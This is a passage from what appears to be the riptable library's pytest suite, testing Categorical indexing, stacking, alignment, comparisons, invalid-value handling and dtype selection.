values, incomplete_cats, ordered=True, base_index=1, unicode=True, filter=None, invalid=invalid,
)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 3
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'U'
assert cats.isunicode
def test_getitem_enum_str(self):
codes = [1, 44, 44, 133, 75]
correct = [True, False, False, False, False]
valid_str = 'StronglyDisagree'
invalid_str = 'q'
c = Categorical(codes, LikertDecision)
# with self.assertRaises(IndexError):
mask = c[valid_str]
is_correct = bool(np.all(mask == correct))
assert is_correct
with pytest.raises(ValueError):
mask = c[invalid_str]
assert sum(mask) == 0
def test_match_str_to_category(self):
single_byte = b'a'
single_unicode = 'a'
single_true_unicode = u'\u2082'
byte_values = [b'a', b'b', b'c', b'c', b'd', b'a', b'b']
values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
true_unicode = [u'\u2082', u'\u2083', u'\u2082']
# 4/25/2019 - changed these tests to construct a Categorical, rather than
# a Categories object directly. Categorical will always make a Categories object.
# (held in _categories_wrap)
c = Categorical(values, ordered=True, base_index=1, filter=None)
matching_char = c._categories_wrap.match_str_to_category(single_unicode)
assert isinstance(matching_char, bytes)
with pytest.raises(TypeError):
matching = c._categories_wrap.match_str_to_category(single_true_unicode)
univals = np.array(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
matching_char = c._categories_wrap.match_str_to_category(single_byte)
assert isinstance(matching_char, str)
c = Categorical(values, ordered=True, base_index=1, filter=None)
matching = c._categories_wrap.match_str_to_category(values)
assert matching.dtype.char == 'S'
with pytest.raises(TypeError):
matching = c._categories_wrap.match_str_to_category(true_unicode)
c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
matching = c._categories_wrap.match_str_to_category(values)
assert matching.dtype.char == 'U'
# Categories object being removed
# Disabling these tests - methods will move into Categorical
# 4/24/2019
# def test_get_category_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=True, base_index=1, filter=None)
# # when found, will return exact index
# str_idx = c.get_category_index('b')
# self.assertEqual(str_idx, 2)
# # when ordered, will return floating point for LTE GTE
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 4.5)
# # when unordered, will return invalid index (length of string array)
# c._sorted = False
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 6)
# def test_get_category_match_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=False, base_index=1, filter=None)
# string_matches = c.get_category_match_index(['a','b'])
# self.assertEqual(string_matches, [1,2])
# c._mode = CategoryMode.IntEnum
# with self.assertRaises(NotImplementedError):
# string_matches = c.get_category_match_index(['a','b'])
def test_possibly_invalid(self):
values = ['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g']
c = Categorical(values, base_index=1)
out_of_range = -50
sentinel = INVALID_DICT[c.dtype.num]
c.view(FastArray)[0] = out_of_range
# c.view(FastArray)[1] = sentinel
# **changed invalid, all will display as bad code if changed underneath and not in range
assert c[0] == "!<-50>"
# self.assertEqual(c[1], "!<inv>")
def test_categories_getitem_str_list(self):
codes = [1, 44, 44, 133, 75]
correct = FastArray([False, True, True, False, True])
c = Categorical(codes, LikertDecision)
mask = c[['StronglyAgree', 'Disagree']]
is_correct = bool(np.all(mask == correct))
assert is_correct
mask = c[[b'StronglyAgree', b'Disagree']]
is_correct = bool(np.all(mask == correct))
assert is_correct
def test_categories_print_repr(self):
self._notimpl()
def test_enum_dict_warning(self):
class DupeEnum(IntEnum):
code_a = 1
code_b = 1
code_c = 1
code_d = 2
with pytest.warns(UserWarning):
c = Categorical([1, 2], DupeEnum)
# ------------------------- TEST MERGE -------------------------------------------
# def test_merge(self):
# from riptable.rt_categorical import categorical_merge
# c_bytes = Categorical(['b','b','b','a','b','b'], ['a','b'])
# c_unicode = Categorical(["AAPL\u2080","AMZN\u2082"])
# result = categorical_merge([c_bytes, c_unicode])
# # self.assertTrue(result[0]._categories_wrap._list is result[1]._categories_wrap._list, msg=f"Categorical merge did not assign the same dictionary to both arrays.")
# self.assertEqual(result[0]._categories_wrap._list.dtype.char, 'U', msg=f"{result[0]._categories_wrap._list.dtype.char} was not 'U'. dictionary was not flipped to unicode.")
# for item in c_bytes._categories_wrap._list:
# self.assertTrue(item.decode() in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# for item in c_unicode._categories_wrap._list:
# self.assertTrue(item in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
# c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
# [cm1, cm2] = categorical_merge([c1, c2])
# self.assertTrue((cm1 == [1, 1, 3, 2, 2]).all())
# self.assertTrue((cm2 == [2, 2, 4, 4, 3]).all())
# ------------------------- TEST HSTACK -------------------------------------------
def test_hstack(self):
c1 = Categorical(['a', 'a', 'c', 'b', 'b'])
c2 = Categorical(['b', 'b', 'd', 'd', 'c'])
cm = Categorical.hstack([c1, c2])
assert (cm.as_string_array == ['a', 'a', 'c', 'b', 'b', 'b', 'b', 'd', 'd', 'c']).all()
c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
cm = Categorical.hstack([c1, c2])
assert (cm == [1, 1, 3, 2, 2, 2, 2, 4, 4, 3]).all()
def test_hstack_fails_for_different_mode_cats(self):
# Create a dictionary-mode Categorical (from ISO3166 data).
# The dictionary is created manually below instead of using e.g.
# {k: int(v) for (k, v) in ISOCountryCode.__members__.items()}
        # so that the insertion order of the dictionary we give to Categorical does
        # not imply an ordering of the keys/values.
country_code_dict = {
'IRL': 372, 'USA': 840, 'AUS': 36, 'HKG': 344, 'JPN': 392,
'MEX': 484, 'KHM': 116, 'THA': 764, 'JAM': 388, 'ARM': 51
}
# The values for the Categorical's backing array.
# This includes some value(s) not in the dictionary and not all values in the dictionary are used here.
country_num_codes = [36, 36, 344, 840, 840, 372, 840, 372, 840, 124, 840, 124, 36, 484]
cat1 = rt.Categorical(country_num_codes, country_code_dict)
assert cat1.category_mode == CategoryMode.Dictionary
# Create a single-key, string-mode Categorical.
cat2 = rt.Categorical(['AUS', 'AUS', 'HKG', 'USA', 'USA', 'IRL', 'USA', 'IRL', 'USA', 'KHM', 'IRL', 'AUS', 'MEX'])
assert cat2.category_mode != CategoryMode.Dictionary
# Try to hstack the two Categoricals. This should fail due to the CategoryMode values being different.
with pytest.raises((ValueError, TypeError)):
rt.hstack([cat1, cat2])
def test_align(self):
c1 = Categorical(['a', 'b', 'c'])
c2 = Categorical(['d', 'e', 'f'])
c3 = Categorical(['c', 'f', 'z'])
cm = Categorical.align([c1, c2, c3])
assert (cm[0].as_string_array == ['a', 'b', 'c']).all()
assert (cm[1].as_string_array == ['d', 'e', 'f']).all()
assert (cm[2].as_string_array == ['c', 'f', 'z']).all()
assert (cm[0].categories() == FastArray([b'Filtered', b'a', b'b', b'c', b'd', b'e', b'f', b'z'])).all()
assert (cm[0].categories() == cm[1].categories()).all()
assert (cm[0].categories() == cm[2].categories()).all()
c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
cm = Categorical.align([c1, c2])
assert (cm[0] == [1, 1, 3, 2, 2]).all()
assert (cm[1] == [2, 2, 4, 4, 3]).all()
# Multikey with nested Categorical
c1 = Categorical([Categorical(['a']), FastArray([1])])
c2 = Categorical([Categorical(['b']), FastArray([2])])
cm = Categorical.align([c1, c2])
assert cm[0][0] == ('a', 1)
assert cm[1][0] == ('b', 2)
assert cm[0].category_dict == cm[1].category_dict
def test_categorical_merge_dict(self):
from riptable.rt_categorical import categorical_merge_dict
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}
d2 = {'a': 1, 'e': 5, 'b': 2, 'f': 6}
c1 = Categorical([3, 3, 4, 3, 1, 2, 5], d1)
c2 = Categorical([1, 1, 5, 2, 2, 1, 5], d2)
combined = categorical_merge_dict([c1, c2], return_type=dict)
for i in range(1, 6):
assert i in combined.values()
def test_getitem_empty(self):
c = Categorical([0, 1, 2], ['a', 'b', 'c'])
empty_list = c[[]]
assert isinstance(empty_list, Categorical)
dict_matches = bool(np.all(empty_list.categories() == c.categories()))
assert dict_matches
with pytest.raises(IndexError):
empty_np = c[np.array([])]
assert isinstance(empty_np, Categorical)
dict_matches = bool(np.all(empty_np.categories() == c.categories()))
assert dict_matches
def test_iter_groups(self):
correct_keys = FastArray(['a', 'b', 'c', 'd', 'e'])
correct_idx = [[8], [3], [5, 6], [2, 9], [0, 1, 4, 7]]
str_arr = FastArray(['e', 'e', 'd', 'b', 'e', 'c', 'c', 'e', 'a', 'd'])
c = Categorical(str_arr)
for i, tup in enumerate(c.iter_groups()):
assert tup[0] == correct_keys[i]
assert bool(np.all(tup[1] == correct_idx[i]))
def test_enum_dict_multi(self):
self._notimpl()
# not implemented
def test_enum_init_errors(self):
with pytest.raises(TypeError):
c = Categorical(['a', 'b', 'c'], LikertDecision)
def test_custom_invalid_category(self):
# 5/16/2019 invalid must appear in provided uniques
c = Categorical(
['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1,
)
assert c[3] == 'my_invalid'
assert c.isnan()[3]
assert len(c.category_array) == 4
@pytest.mark.xfail(reason="After invalid_set, the custom invalid value is not displayed.")
def test_invalid_set(self):
c = Categorical(
['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1,
)
# set a new string to be displayed for invalid items and validate
custom_invalid = "custom_invalid"
c.invalid_set(custom_invalid)
assert c[3] == custom_invalid
assert c.isnan()[3]
assert len(c.category_array) == 4
def test_lock_unlock(self):
self._notimpl()
# halfway implemented
def test_set_item(self):
self._notimpl()
# when index needs to be fixed after categories are added
# setitem with integer / invalid integer
# setitem with string / invalid category
def test_return_empty_cat(self):
self._notimpl()
# this code still needs to get written
def test_getitem_np_str(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
correct = FastArray([True, True, True, True, False, False, True])
with pytest.raises(IndexError):
result = c[np.array(['a', 'b'])]
# self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
with pytest.raises(IndexError):
result = c[np.array(['a', 'b']).astype('S')]
# self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
def test_getitem_slice(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
result = c[:3]
assert isinstance(result, Categorical)
match_fa = bool(np.all(result.view(FastArray) == [1, 1, 2]))
assert match_fa
assert len(result) == 3
assert len(result._categories_wrap) == 3
def test_categorical_compare_check(self):
self._notimpl()
# Categories have different modes
# categories are both enum
# compare cat to empty list
# non-categorical input
# convert all to unicode if one is unicode
# this keyword wasn't used anywhere, removed from copy()
# def test_copy_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'])
# invalid_copy = c.copy(fill_invalid=True)
# all_invalid = bool(np.all(invalid_copy.view(FastArray)==-128))
# self.assertTrue(all_invalid)
# for idx, item in enumerate(c.categories()):
# self.assertEqual(item, invalid_copy.categories()[idx])
# self.assertFalse(c.categories() is invalid_copy.categories())
def test_fill_invalid(self):
values = list('aabaccb')
c = Categorical(values, base_index=1)
c.fill_invalid(inplace=True)
assert_array_equal(FastArray([c.filtered_name] * len(values)), c.expand_array)
assert_array_equal(FastArray([0] * len(values)), c._fa)
expected = FastArray(sorted(set(values))).astype('|S1')
assert_array_equal(expected, c.category_array)
assert_array_equal(expected, c.category_dict[next(iter(c.category_dict))]) # values of first key
def test_force_unicode(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], unicode=True)
result_dtype = c.categories().dtype.char
assert result_dtype == 'U', f"Failed to force unicode when constructing categorical from list of string values"
def test_categories_shallow_copy(self):
codes = [10, 10, 20, 10, 30, 20, 10]
d = {10: 'a', 20: 'b', 30: 'c'}
c = Categorical(codes, d)
original_cats = c._categories_wrap
new_cats = original_cats.copy(deep=False)
assert (
original_cats._str_to_int_dict is new_cats._str_to_int_dict
), f"Categories did not use same str_to_int dictionary after shallow copy."
assert (
original_cats._int_to_str_dict is new_cats._int_to_str_dict
), f"Categories did not use same int_to_str dictionary after shallow copy."
# 5/16/2019 invalid category must be in user provided
# def test_two_lists_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'],np.array(['a','b']), invalid='inv', base_index=1)
# self.assertEqual(c[4],FILTERED_LONG_NAME)
@pytest.mark.xfail(
reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.'
)
def test_getitem_enum_list(self):
c = Categorical([44, 133, 133, 75, 144, 1], LikertDecision)
with pytest.raises(IndexError):
result = c[[b'NeitherAgreeNorDisagree']]
correct = FastArray([False, False, False, False, True, False])
# self.assertTrue(array_equal(result, correct))
result = c[[4]]
assert result[0] == 'NeitherAgreeNorDisagree'
def test_non_unique(self):
with pytest.raises(ValueError):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], ['a', 'a', 'b'])
def test_match_to_category(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
result = c._categories_wrap.match_str_to_category('a')
assert b'a' == result
with pytest.raises(TypeError):
result = c._categories_wrap.match_str_to_category([1, 2, 3])
with pytest.raises(TypeError):
result = c._categories_wrap.match_str_to_category({1, 2, 3})
c1 = Categorical(['abc', 'def', 'abc', 'abc'], np.array(['abc', 'def']), unicode=True)
result = c1._categories_wrap.match_str_to_category([b'a'])
assert result.dtype.char == 'U'
# ------------------------------------TEST SET ITEM------------------------------------------
def test_set_item_str_index(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
correct = [2, 2, 2, 2, 2, 2]
c['a'] = 'b'
is_correct = bool(np.all(c.view(FastArray) == correct))
assert is_correct, f"Category was not correctly changed with set item on a string."
with pytest.raises(ValueError):
c['b'] = 'c'
def test_set_item_int_index(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
correct = [1, 2, 2, 1, 2, 2]
c[0] = 'a'
is_correct = bool(np.all(c.view(FastArray) == correct))
assert is_correct, f"Category was not correctly changed with set item on an int."
with pytest.raises(ValueError):
c[0] = 'c'
# ------------------------------------TEST CALCULATE DTYPE ----------------------------------
def test_get_dtype_from_len(self):
        '''
        Categorical selects the smallest integer dtype that can hold the number of unique category bins.
        '''
dtype_sizes = {
np.int8: 1,
np.int16: 101,
np.int32: 50001,
} # , np.int64:2000000001 }
for dt, sz in dtype_sizes.items():
LENGTH = 6
NO_CODES = sz
alphabet = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
np_alphabet = np.array(alphabet, dtype="|U1")
np_codes = np.random.choice(np_alphabet, [NO_CODES, LENGTH])
codes = ["".join(np_codes[i]) for i in range(len(np_codes))]
c = Categorical(["".join(np_codes[i]) for i in range(len(np_codes))])
# only perform the test if there are enough uniques
if len(c._categories_wrap._list) >= sz:
assert c.dtype == dt, f"Categorical did not set dtype to {dt} for array of size {sz}."
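# A hedged illustration of the selection rule exercised above: the integer dtype of the
# backing codes grows with the number of unique categories. The thresholds below are
# inferred from this test's dtype_sizes table, not from library documentation.
#   Categorical(list('ab') * 5)._fa.dtype         # int8  -- a handful of uniques
#   a categorical with ~101 unique categories     # int16
#   a categorical with ~50001 unique categories   # int32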
# -------SINGLE INTEGER
def test_getitem_int(self):
'''
Single integer index should return the corresponding category in unicode format.
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
assert c[0] == 'b', f"Get item with integer did not return the correct category."
assert isinstance(c[0], str), f"Get item with integer did not return as unicode."
assert c[3] == 'a', f"Get item with integer did not return the correct category."
assert isinstance(c[3], str), f"Get item with integer did not return as unicode."
with pytest.raises(IndexError):
d = c[10]
# --------INTEGER MASK
def test_getitem_int_mask(self):
py_mask = [0, 3]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for mask in [py_mask, np.array(py_mask)]:
d = c[mask]
assert isinstance(
d, Categorical
), f"Get item with integer mask did not return a categorical. Returned {type(d).__name__} instead."
assert len(d) == len(
mask
), f"Get item with integer mask did not return a categorical of length {len(mask)}. Returned {len(d)} instead."
has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list))
assert (
has_same_cats
), f"Failed to copy the same categories to new categorical after getitem with integer mask."
d = c[[0, 10]]
assert d._fa[1] == 0, f"Failed to put invalid for out of range index."
# -------BOOLEAN MASK
def test_getitem_bool_mask(self):
py_mask = [True, True, True, False, True, True]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for mask in [py_mask, np.array(py_mask)]:
d = c[mask]
assert not (
b'a' in d.as_string_array
), f"b'a' does not get trimmed out of categorical with getitem from boolean array."
assert 5 == len(
d
), f"Length {len(d)} did not match 5 in categorical getitem with a boolean array of the same size."
has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list))
assert (
has_same_cats
), f"Failed to copy the same categories to new categorical after getitem with boolean mask."
# -------SINGLE STRING
def test_getitem_single_string(self):
b_result = [True, True, True, False, True, True]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
idx = b'c'
# with self.assertRaises(IndexError):
d = c[idx]
has_true = bool(np.any(d))
assert not has_true, f"Failed to return an array of all false for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = idx.decode()
# with self.assertRaises(IndexError):
d = c[idx]
has_true = bool(np.any(d))
assert not has_true, f"Failed to return an array of all false for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = b'b'
# with self.assertRaises(IndexError):
d = c[idx]
is_correct = bool(np.all(d == b_result))
assert is_correct, f"Did not return the correct array for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = idx.decode()
# with self.assertRaises(IndexError):
d = c[idx]
is_correct = bool(np.all(d == b_result))
assert is_correct, f"Did not return the correct array for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
# ------MULTIPLE STRINGS
def test_getitem_multiple_strings(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'])
inputs = {
(b'b',): [True, True, True, False, True, True], # single in (list)
(b'c',): [False, False, False, False, False, False], # single not in (list)
(b'a', b'b'): [True, True, True, True, True, True], # both in (list)
(b'c', b'd'): [False, False, False, False, False, False,], # both not in (list)
(b'b', b'c'): [True, True, True, False, True, True], # mixed (list)
}
for idx, correct in inputs.items():
idx = list(idx)
d = c[idx]
is_correct = bool(np.all(d == correct))
assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result."
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = [b.decode() for b in idx]
d = c[idx]
is_correct = bool(np.all(d == correct))
assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result."
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
# ------NUMERIC GETITEM
def test_getitem_numeric_categories(self):
# Before the fix, getitem on a numeric categorical incorrectly returned a string representation of the category.
nums = np.array([1, 1, 2, 3, 4, 5, 1, 1, 1])
c = Categorical(nums)
assert c[0] == 1
assert isinstance(c[0], (int, np.integer))
nums = nums.astype(np.float32)
c = Categorical(nums)
assert c[0] == 1.0
assert isinstance(c[0], (float, np.floating)), f"Expected float, got {type(c[0])}"
# ------------------------- TEST COMPARE CHECK -------------------------------------------
def test_compare_check(self):
'''
Test comparison between two 'equal' categoricals with different underlying arrays.
'''
compare_ops = {
'__ne__': [False, False, False, False, False, False],
'__eq__': [True, True, True, True, True, True],
'__ge__': [True, True, True, True, True, True],
'__gt__': [False, False, False, False, False, False],
'__le__': [True, True, True, True, True, True],
'__lt__': [False, False, False, False, False, False],
}
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b', 'c'])
d = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for name, correct in compare_ops.items():
func = c.__getattribute__(name)
result = func(d)
is_correct = bool(np.all(result == correct))
assert is_correct, f"Compare operation between two equal categoricals did not return the correct result."
def test_compare_return_type(self):
'''
Test comparison operations with single strings to make sure FastArray of boolean is returned.
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
scalars = ['a', 'c']
compare_ops = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__']
for s in scalars:
for op in compare_ops:
func = c.__getattribute__(op)
result = func(s)
assert isinstance(result, FastArray), f"comparison {op} with input {s} did not return FastArray"
assert result.dtype.char == '?', f"comparison {op} with input {s} did not return boolean"
def test_compare_different_modes(self):
c1 = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
c2 = Categorical([0, 1], {0: 'a', 1: 'b'})
with pytest.raises(TypeError):
c1 == c2
def test_compare_conflicting_dicts(self):
c1 = Categorical([0, 1], {0: 'a', 1: 'b'})
c2 = Categorical([0, 1], {1: 'a', 0: 'b'})
with pytest.raises(ValueError):
c1 == c2
def test_compare_safe_dicts(self):
c1 = Categorical([0, 1], {0: 'a', 1: 'b'})
c2 = Categorical([2, 1], {2: 'c', 1: 'b'})
correct = FastArray([False, True])
result = c1 == c2
match = bool(np.all(correct == result))
assert match
def test_isnan(self):
c = Categorical([1, 1, 3, 2, 2], ['a', 'b', 'c'], base_index=1, invalid='a')
is_correct = [True, True, False, False, False]
is_not_correct = [False, False, True, True, True]
assert bool(np.all(is_correct == isnan(c)))
assert bool(np.all(is_correct == c.isnan()))
assert bool(np.all(is_not_correct == isnotnan(c)))
assert bool(np.all(is_not_correct == c.isnotnan()))
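# A descriptive note on the semantics verified above: declaring invalid='a' makes every
# row whose category is 'a' behave as missing, so isnan/isnotnan flag those rows rather
# than any numeric NaN in the backing codes. A minimal sketch (values hypothetical):
#   Categorical([1, 1, 3], ['a', 'b', 'c'], invalid='a').isnan()   # -> [True, True, False]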
# ------------------------------------------------------
def test_get_categories(self):
# string list
c = Categorical(['a', 'b', 'c', 'd', 'e'])
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# numeric list
c = Categorical(np.array([1, 2, 3, 4, 5]))
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# dict/enum
c = Categorical([1, 2, 3, 4], {1: 'a', 2: 'b', 3: 'c', 4: 'd'})
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
catscodes = c.category_codes
assert isinstance(catscodes, np.ndarray)
catsmapping = c.category_mapping
assert isinstance(catsmapping, dict)
# multikey
c = Categorical([np.arange(5), np.random.rand(5)])
with pytest.raises(TypeError):
catsarray = c.category_array
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 2
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# ------------------------------------------------------
def test_force_base_index2(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c.base_index == 1
assert c._fa[0] == 1
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
assert c.base_index == 0
assert c._fa[0] == 0
codes = np.array([0, 0, 1, 2, 0])
cats = np.array(['a', 'b', 'c'])
# c = Categorical(codes, cats)
# self.assertEqual(c.base_index, 0)
# self.assertEqual(c._fa[0], 0)
codes += 1
c = Categorical(codes, cats, base_index=1)
assert c.base_index == 1
assert c._fa[0] == 1
codes = codes.astype(np.float32)
c = Categorical(codes, cats, from_matlab=True)
assert c.base_index == 1
assert c._fa[0] == 1
with pytest.raises(ValueError):
c = Categorical(codes, cats, from_matlab=True, base_index=0)
c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c']))
assert c.base_index == 1
assert c._fa[0] == 1
c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c']), base_index=0)
assert c.base_index == 0
assert c._fa[0] == 0
# ------------------------------------------------------
def test_ordered(self):
c = Categorical(['c', 'c', 'a', 'b', 'c'])
cats = c.category_array
assert cats[0] == b'a'
c = Categorical(['c', 'c', 'a', 'b', 'c'], ordered=False)
cats = c.category_array
assert cats[0] == b'c'
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b'])
cats = c.category_array
assert cats[0] == b'c'
assert not c.ordered
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['a', 'b', 'c'])
assert c.ordered
## removed this test - side-effect of search sorted with unsorted array (not categorical related)
## false claim that categories are ordered in keyword
# c = Categorical(['c','c','a','c','c'], ['c','a','b'], ordered=True)
# self.assertTrue(bool(np.all(c!='c')))
# self.assertTrue(bool(np.all(c!=b'c')))
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b'], ordered=False)
cats = c.category_array
assert cats[0] == b'c'
assert not c.ordered
codes = FastArray([0, 0, 1, 2, 0])
cats = FastArray(['c', 'b', 'a'], unicode=True)
c = Categorical(codes, cats)
assert c.category_array[0] == 'c'
assert not c.ordered
# with self.assertWarns(UserWarning):
# c = Categorical(codes, cats, ordered=True)
# self.assertEqual(c.category_array[0], b'c')
# self.assertFalse(c.ordered)
# ------------------------------------------------------
def test_keywords_not_allowed(self):
# filter + base index 0
f = np.array([True, False, True])
with pytest.raises(ValueError):
c = Categorical(['a', 'b', 'c'], filter=f, base_index=0)
# ------------------------------------------------------
def test_display_properties(self):
'''
Categoricals take over their display properties to appear like strings (not the underlying integer array)
(see Utils.rt_display_properties)
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
item_format, convert_func = c.display_query_properties()
assert item_format.length == DisplayLength.Long, f"Incorrect length for item format."
assert item_format.justification == DisplayJustification.Left
assert item_format.invalid == None
assert item_format.can_have_spaces == True
assert item_format.decoration == None
assert item_format.color == DisplayColumnColors.Default
assert convert_func.__name__ == 'display_convert_func'
# this could change, right now the convert function just does a str over the item
assert convert_func(1, item_format) == '1', f"Incorrect convert function was returned."
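# A minimal usage sketch of the hook checked above, assuming only the public
# display_query_properties() API used in this test (example values are hypothetical):
#   fmt, to_str = Categorical(['x', 'y', 'x']).display_query_properties()
#   to_str(2, fmt)   # -> '2': the convert function currently just str()'s the item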
# ------------------------------------------------------
# -----MISC. COVER TESTS--------------------------------
def test_non_array_dict_categories_ctor(self):
with pytest.raises(TypeError):
c = Categories(['garbage', 'list'])
def test_too_many_args_categories_ctor(self):
with pytest.raises(ValueError):
c = Categories(FastArray([1]), FastArray([2]), FastArray([3]))
def test_filter_and_invalid(self):
c = Categorical(
['a', 'a', 'b', 'c', 'c'], ['c'], invalid='a', filter=FastArray([True, True, False, True, True]),
)
c.filtered_set_name('a')
assert bool(np.all(c._fa == [0, 0, 0, 1, 1]))
for i in range(3):
assert c[i] == 'a'
for i in range(3, 5):
assert c[i] == 'c'
def test_zero_base_with_invalid(self):
with pytest.raises(ValueError):
c = Categorical(['a', 'b', 'c'], ['b', 'c'], base_index=0)
# removed this property from Categories 04/24/2019
# def test_multikey_labels(self):
# c = Categorical([FastArray(['a','b','c']), FastArray([1,2,3])])
# labels = c._categories_wrap.multikey_labels
# self.assertTrue(isinstance(labels[0], tuple))
# self.assertEqual(labels[0][0],'a')
def test_ncols_non_multikey(self):
c = Categorical(['a', 'b', 'c'])
assert c._categories_wrap.ncols == 1
# now checks for single / multikey / enum, not CategoryMode
# def test_len_undefined_mode(self):
# c = Categorical(['a','b','c'])
# c._categories_wrap._mode = CategoryMode.Default
# self.assertEqual(len(c._categories_wrap),0)
def test_categories_copy_shallow(self):
c = Categorical(['a', 'b', 'c'])
copycat = c._categories_wrap.copy(deep=False)
assert isinstance(copycat, Categories)
def test_categories_copy_deep(self):
c = Categorical([1, 2, 3], {1: 'a', 2: 'b', 3: 'c'})
copycat = c._categories_wrap.copy(deep=False)
assert isinstance(copycat, Categories)
# impossible path, unless mode is forced like below. disabling 4/24/2019
# c._categories_wrap._mode = CategoryMode.Default
# with self.assertRaises(NotImplementedError):
# c = c._categories_wrap.copy()
def test_wrap_get_categories(self):
c = Categorical(['a', 'b', 'c'])
arr = c._categories_wrap.get_categories()
assert isinstance(arr, FastArray)
c = Categorical([FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])])
d = c._categories_wrap.get_categories()
assert isinstance(d, dict)
def test_get_string_mode_nums(self):
c = Categorical(np.arange(5))
assert not c._categories_wrap.isbytes
assert not c._categories_wrap.isunicode
def test_pop_single_arr(self):
c = Categorical([np.array(['a', 'b', 'c'])])
d = Categorical(np.array(['a', 'b', 'c']))
